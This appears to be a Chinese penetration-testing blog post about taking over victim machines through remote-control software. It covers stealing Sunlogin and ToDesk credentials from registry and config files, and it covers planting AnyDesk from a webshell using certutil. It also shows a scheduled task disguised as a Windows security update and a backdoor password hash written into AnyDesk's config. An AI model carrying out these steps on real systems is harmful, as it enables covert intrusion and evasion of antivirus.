内网远程控制总结

news2024/11/25 4:22:43

前言

在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。

远程控制软件

向日葵篇

向日葵查看版本

向日葵(可以攻击)

针对向日葵的话其实如果有本地安装的话,是有可能存在漏洞的。这里进行复现

 向日葵个人版for Windows <= 11.0.0.33
 向日葵简约版 <= V1.0.1.43315(2021.12)
 测试客户端漏洞版本:11.0.0.33162

攻击过程:

(1)tasklist 查看是否有sunlogin的进程
(2)直接用golang的工具来进行攻击即可

https://github.com/Mr-xn/sunlogin_rce

向日葵(不可以攻击)

遇到不可以攻击的向日葵,我们也有几种渗透手法:

(1)窃取配置文件来进行解密(低版本 版本号具体未知)

低版本的向日葵把密码和机器码加密写入到了配置文件中,我们可以把配置文件down到自己的机器上,然后进行重开向日葵即可。这里向日葵版本较低,就不进行测试

(2)在12.5.2之前的某些版本可以写到了注册表中,所以可以使用注册表来进行查询
reg query HKEY\_USERS\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginInfo  
reg query HKEY\_USERS\\.DEFAULT\\Software\\Oray\\SunLogin\\SunloginClient\\SunloginGreenInfo  
向日葵默认配置文件路径:  
安装版:C:\\Program Files\\Oray\\SunLogin\\SunloginClient\\config.ini  
便携版:C:\\ProgramData\\Oray\\SunloginClient\\config.ini  
本机验证码参数:encry\_pwd  
本机识别码参数:fastcode(去掉开头字母)  
sunlogincode:判断用户是否登录状态

在向日葵高于 12.5.3.* 的机器中已经没有办法获取secert了

 

todesk篇

常见渗透方式(偷配置,百试百灵)

这里还是和前面的向日葵一样,可以进行配置文件的窃取,这里的默认安装路径(C:\Program Files\ToDesk\config.ini)

这里咱们可以攻击机安装todesk,然后读取到config.ini中的配置文件,然后和攻击机进行替换即可。这里我虚拟机假装是受害机,读取出来,然后攻击机把tempauthpassex进行替换。

本机下载todesk进行替换。

两个机器密码相同(进行替换的时候需要修改攻击机密码更新频率)

anydesk

anydesk的配置文件在 C:\Users\用户名\AppData\Roaming\AnyDesk   文件中

而通常这个时候我们有权限修改anydesk的配置文件,这里进行测试,起两个虚拟机,设定一个场景(攻击机拿到了webshell,受害机开着windows defender,如何去渗透拿到受害机权限)

攻击机 ip: 10.211.55.3 + 10.211.55.2
受害机 ip: 10.211.55.4(windows defender全开)

情景复现

这里拿到了受害机的webshell,是个普通权限,无法去关闭

这里可以看到有windows defender来运行,这里无法进行关闭windows defender,

这里用powershell来执行远程命令下载anydesk到用户的目录中去,因为虚拟机只有C盘,所以我创建了一个目录来进行存放,在真实的渗透过程中,一般是有RWE的目录

可以用任意一种方式来放进去,只要放进去就有,这里列举一种方式
这里列举一种(也可以有权限之后,直接拖入上传)
certutil -urlcache -split -f https://download.anydesk.com/AnyDesk.exe C:/tmp/anydesk.exe

上传上去之后,先不去打开。转到攻击机进行操作

(1)这里先去给攻击机下载anydesk(如果下载过的小伙伴,要先清除) C:\Users\用户名\AppData\Roaming\AnyDesk中的配置,没有的就不用看这一步,清除结束后如下

(2)这里打开攻击机的anydesk,牢记我此处勾选的id,然后点击右上角的概述-->为自主访问设置密码-->设置一个密码(这里设置为Q16G666!!)--->之后点击应用,攻击机完全退出anydesk(小托盘也要退出),并且退出时不选择安装anydesk

(3)攻击机完全退出anydesk(小托盘也要退出),这里还是到配置文件下 C:\Users\用户名\AppData\Roaming\AnyDesk,然后把文件复制下来。是我图中勾选的这四个。复制完成之后,攻击机将文件进行删除。

复制下来之后,给受害机的当前用户(拿到权限的用户)找到anydesk配置文件路径并且复制到其他(如果没有配置文件路径则进行创建配置文件路径),一定要注意这里攻击机复制完之后,一定要将攻击机中的配置文件进行删除

(4)重新打开攻击机,生成配置文件,启动受害机的anydesk。

(5)用攻击机进行连接,这里连接的id就是(2)中截图的id,密码就是(2)中设置的密码即可成功无感绕过windows defender

情景复现2 (计划任务)

(1)确定用户创建计划任务

如果命令行不能去执行,则可以去创建计划任务去执行,例如,必须先确定当前用户,在当前用户的目录下执行anydesk,

powershell "(((Get-WmiObject -Class Win32_Process -Filter 'Name=\"explorer.exe\"').GetOwner().user) -split '\n')[0]

schtasks /Create /TN Windows_Security_Update /SC monthly /tr "C:\Users\testuser.G1TS\Desktop\anydesk.exe" /RU 用户名

执行计划任务
schtasks /run /tn Windows_Security_Update

后续步骤和上面相同

然后添加密码到配置文件中去(密码为AnyDeskGetAccess)

echo ad.anynet.pwd_hash=85352d14ed8d515103f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a501c >> C:\Users\用户目录\AppData\Roaming\AnyDesk\service.conf
echo ad.anynet.pwd_salt=cb65156829a1d5a7281bfe8f6c98734a >> C:\Users\用户目录\AppData\Roaming\AnyDesk\service.conf

然后查看用户的id

type C:\Users\用户名\AppData\Roaming\AnyDesk\system.conf

连接即可

优点:

整个过程都不需要进行UAC弹窗,真正实现了无感绕过

缺点:

(1)会弹出anydesk的界面,导致一些问题

(2)启动anydesk的权限需要桌面用户权限,比如,IIS做了中间件环境,拿到的webshell一般都是没有桌面用户权限,如果启动anydesk是不会成功的。

gotohttp

gotohttp在我的渗透测试过程中,是一个常见的方式,给我的感觉,即用即连,浏览器连接,方便快捷。但是缺点就是权限划分明确,普通用户权限起的gotohttp无法进行管理员权限操作,比如关闭windows defender和其他一些行为,不过在规避杀软这儿也有奇效。

复现过程

普通用户上去之后只能用普通用户权限(这里下载对应的gotohttp https://gotohttp.com/),上传上去,命令行运行他,直接在当前目录下生成配置文件,读取配置文件,即可成功连接

因为是普通用户启动的,这里如果尝试关闭windows defender,是无法进行点击的。

参考

https://blog.csdn.net/weixin_44216796/article/details/112118108

官网地址:https://sec.zianstudy.com

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/939427.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

[CKA]考试注意事项及作者考试结果

在CKA考试的时候&#xff0c;注意目前可以使用中文名进行注册&#xff0c;最后证书上的名字也是中文名 考试前准备&#xff1a; 1、身份证 2、桌面除了电脑鼠标其他物品都收好 3、房间就自己一个人&#xff0c;不允许房间有其他人 4、网速要快&#xff0c;博主特意升级了自…

GBU814-ASEMI功率整流器件GBU814

编辑&#xff1a;ll GBU814-ASEMI功率整流器件GBU814 型号&#xff1a;GBU814 品牌&#xff1a;ASEMI 封装&#xff1a;GBU-4 恢复时间&#xff1a;&#xff1e;50ns 正向电流&#xff1a;8A 反向耐压&#xff1a;1400V 芯片个数&#xff1a;4 引脚数量&#xff1a;4 …

CGLIB代理,jsp,EL表达式,JSTL标准标签库

1、CGLIB代理 有一个类没有实现接口&#xff0c;想要对这个类实现增强&#xff0c;就需要使用CGLIB代理 导入CGLIB的包 <dependency><groupId>cglib</groupId><artifactId>cglib</artifactId><version>3.3.0</version> </depende…

集成易点易动管理系统连接更多应用

场景描述&#xff1a; 基于易点易动开放平台能力&#xff0c;无代码集成易点易动与多个应用互通互连&#xff0c;实现固定资产管理数字化、智能化。通过Aboter可搭建业务自动化流程&#xff0c;实现多个应用之间的数据连接。 开放能力&#xff1a; 消息推送&#xff1a; 新…

无涯教程-分类算法 - 多项式逻辑回归模型函数

Logistic逻辑回归的另一种有用形式是多项式Lo​​gistic回归&#xff0c;其中目标或因变量可以具有3种或更多可能的unordered类型&#xff0c;即没有定量意义的类型。 用Python实现 现在&#xff0c;无涯教程将在Python中实现上述多项式逻辑回归的概念。为此&#xff0c;使用…

前端js实现获取指定元素(top,lef,right,bottom)到视窗的距离 ;getBoundingClientRect()获取

getBoundingClientRect()获取元素位置&#xff0c;这个方法没有参数 该函数返回一个Object对象&#xff0c;该对象有6个属性&#xff1a;top,lef,right,bottom,width,height&#xff1b; <div id"box"></div>var objectdocument.getElementById(box); …

产教融合 | 中南大学暑期实训,用万应低代码践行敏捷开发之路

融合学究与实践&#xff0c;方能成为当代“数字英才”。 2023年8月11日&#xff0c;由潇湘大数据研究院、中南大学计算机学院及云畅科技联合组织的2020级数据科学与大数据技术专业暑期‘生产实训’项目圆满结束。本次实训全程线下进行&#xff0c;基于“深度创新培育计划”&…

宇凡微Y51T合封射频芯片,集成433M芯片和MCU

宇凡微推出的Y51T芯片的设计理念很有趣&#xff0c;将MCU和射频芯片集成在一颗芯片内&#xff0c;从而实现高度的集成度和功能优势。这样的设计在某些应用中确实能够带来诸多优点&#xff1a; Y51T将51H MCU和Y4455 433MHz射频芯片融合在一颗芯片内&#xff0c;实现了高度集成的…

GPU中统一内存最新机制解析

通过异构内存管理简化 GPU 应用程序开发 异构内存管理 (HMM) 是一项 CUDA 内存管理功能&#xff0c;它扩展了 CUDA 统一内存编程模型的简单性和生产力&#xff0c;以包括具有 PCIe 连接的 NVIDIA GPU 的系统上的系统分配内存。 系统分配内存是指最终由操作系统分配的内存&#…

face-api实现人脸识别。

face-api实现人脸识别 face-api的由来tensorflow.js 是什么部分代码模型介绍 face-api的由来 访问地址 JavaScript API for face detection and face recognition in the browser implemented on top of the tensorflow.js core API 官方说明 翻译&#xff1a;在tensorflow.js…

oppo手机怎么录屏?录制屏幕,就看这里!

“有人知道oppo手机怎么录屏吗&#xff0c;前几年买的oppo手机&#xff0c;用到现在感觉挺流畅的&#xff0c;也不是很卡顿&#xff0c;最近听说我这个型号的手机也有录屏功能&#xff0c;但是我不知道怎么打开&#xff0c;就想问问大伙&#xff0c;oppo手机怎么录屏呀。” 在…

MySql015——使用子查询

一、创建customers表 ######################## # Create customers table ######################## use study;CREATE TABLE customers (cust_id int NOT NULL AUTO_INCREMENT,cust_name char(50) NOT NULL ,cust_address char(50) NULL ,cust_city char…

LED地板屏幕的工作原理

LED地砖屏是一款数字化地面展示设备&#xff0c;它的实现主要是以数字技术为核心&#xff0c;通过微电脑全数字化处理以及先进的电路保护设备&#xff0c;对视频进行同步控制&#xff0c;并实现了高分辨率的显示效果&#xff0c;在展厅设计以及舞台演出中都有相关的应用。免费提…

【MySQL】组合查询

目录 一、组合查询 1.创建组合查询 2.union规则 3.包含或取消重复的行 4.对组合查询结果排序 一、组合查询 多数SQL查询都只包含从一个或多个表中返回数据的单条SELECT语句。MySQL也允许执行多个查询&#xff08;多条SELECT语句&#xff09;&#xff0c;并将结果作为单个查…

kafka和消息队列

https://downloads.apache.org/kafka/3.5.1/kafka_2.13-3.5.1.tgz d kafka依赖与zookeeper kakka配置文件 broker.id1 #每个 broker 在集群中的唯一标识&#xff0c;正整数。每个节点不一样 listenersPLAINTEXT://192.168.74.70:9092 ##监听地址 num.network.threads3 #…

Monibucav4(开源流媒体服务器)在Windows上搭建rtmp服务器并实现拉取rtsp视频流以及转换flv播放

场景 开源流媒体服务器ZLMediaKit在Windows上运行、配置、按需拉流拉取摄像头rtsp视频流)并使用http-flv网页播放&#xff1a; 开源流媒体服务器ZLMediaKit在Windows上运行、配置、按需拉流拉取摄像头rtsp视频流)并使用http-flv网页播放_srs按需拉流_霸道流氓气质的博客-CSDN…

K-Means(K-均值)聚类算法

目录 K-Means 算法 K-Means 术语 K 值如何确定 K-Means 场景 美国总统大选摇争取摆选民 电商平台用户分层 给亚洲球队做聚类 ​编辑 其他场景 K-Means 工作流程 K-Means 开发流程 K-Means 的评价标准 K-Means 算法 对于 n 个样本点来说&#xff0c;根据距离公式&a…

如何使用HOOPS技术将3D模型转换成点云?

将3D模型转换为点云是一个常见的计算机图形学任务&#xff0c;通常用于将具有几何信息的复杂模型转换为一组离散的点坐标。这可以用于各种应用&#xff0c;如点云分析、计算机辅助设计、虚拟现实等。以下是一些步骤&#xff0c;可供您在将3D模型转换为点云时参考&#xff1a; …

还不会选渲染器?建筑设计师年度爱用排名来了!

近期&#xff0c;建筑设计网站CG architect公布了其主导的一年一度全球建筑渲染引擎调查报告&#xff1a;《2022年建筑可视化渲染引擎调查结果》&#xff0c;该报告主要是针对建筑可视化市场中50多种渲染引擎的使用比例情况。 在3月1号到7月31号期间&#xff0c;CG architect基…

vscode调试PHP代码

目录 准备工作ssh的连接以及配置调试 准备工作 1.首先你需要下载一个vscode 2.下载模块 你需要在VScode中去下载我们所需的两个模块PHP Debug以及remote -ssh 3.安装对应版本的xdebug 需要在xdebug的官方去进行分析&#xff0c;选择适合你自己版本的xdebug 去往官方&#x…